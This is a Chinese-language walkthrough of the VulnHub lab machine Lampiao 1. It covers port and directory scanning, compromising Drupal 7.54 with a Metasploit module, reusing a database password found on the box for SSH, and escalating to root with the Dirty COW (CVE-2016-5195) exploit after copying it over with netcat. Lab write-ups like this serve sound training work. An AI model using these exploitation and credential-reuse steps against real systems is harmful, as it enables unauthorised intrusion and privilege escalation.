VulnHub 兰皮昂 1 Lampiao

一、信息收集

发现开发了22、80、1898端口

VulnHub 兰皮昂 1 Lampiao_第1张图片

访问1898端口:

VulnHub 兰皮昂 1 Lampiao_第2张图片

2.目录扫描

dirb http://192.168.103.179:1898

VulnHub 兰皮昂 1 Lampiao_第3张图片

访问robots.txt目录

VulnHub 兰皮昂 1 Lampiao_第4张图片

发现版本是 Drupal 7.54, 2017-02-01

VulnHub 兰皮昂 1 Lampiao_第5张图片

二、漏洞利用

1.利用msf

VulnHub 兰皮昂 1 Lampiao_第6张图片

use 4

VulnHub 兰皮昂 1 Lampiao_第7张图片

set RHOTS 192.168.103.179

set RPORT 1898

VulnHub 兰皮昂 1 Lampiao_第8张图片

run  #运行
shell  #shell连接
python -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

VulnHub 兰皮昂 1 Lampiao_第9张图片

2.收集信息

VulnHub 兰皮昂 1 Lampiao_第10张图片

'username' => 'drupaluser',
'password' => 'Virgulino',

VulnHub 兰皮昂 1 Lampiao_第11张图片

就只有一个账户,所以猜测数据库的密码就是账户的密码

账户:tiago
密码:Virgulino

VulnHub 兰皮昂 1 Lampiao_第12张图片

3.ssh连接

VulnHub 兰皮昂 1 Lampiao_第13张图片

三、脏牛提权

漏洞描述

漏洞编号:CVE-2016-5195

漏洞名称:脏牛(Dirty COW)

漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权

影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。

┌──(rootkali)-[~]
└─# tar -czvf dcow.tar.gz CVE-2016-5195-master.zip 
CVE-2016-5195-master.zip

VulnHub 兰皮昂 1 Lampiao_第14张图片

一、检查内核版本

通过uname -a 命令,查看内核版本,这里内核版本为4.4.0-31-ubuntu

主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版本,表示还存在脏牛漏洞

1   Centos7 /RHEL7     3.10.0-327.36.3.el7

2   Cetnos6/RHEL6     2.6.32-642.6.2.el6

3   Ubuntu 16.10      4.8.0-26.28

4   Ubuntu 16.04     4.4.0-45.66

5   Ubuntu 14.04     3.13.0-100.147

6   Debian 8       3.16.36-1+deb8u2

7   Debian 7         3.2.82-1

二、上传文件

tiago@lampiao:~$ nc -l 4444 > dcow.tar.gz

┌──(rootkali)-[~]
└─# nc 192.168.103.179 4444 < dcow.tar.gz

VulnHub 兰皮昂 1 Lampiao_第15张图片

上传成功后,在靶机上面解压文件

VulnHub 兰皮昂 1 Lampiao_第16张图片

切换到CVE-2016-5195-master目录后
make
多了一个dcow文件


VulnHub 兰皮昂 1 Lampiao_第17张图片

三、拿root权限

./dcow #拿到root密码

VulnHub 兰皮昂 1 Lampiao_第18张图片

VulnHub 兰皮昂 1 Lampiao_第19张图片

你可能感兴趣的:(VulnHub,web,网络,安全,网络安全,web,python,VulnHub)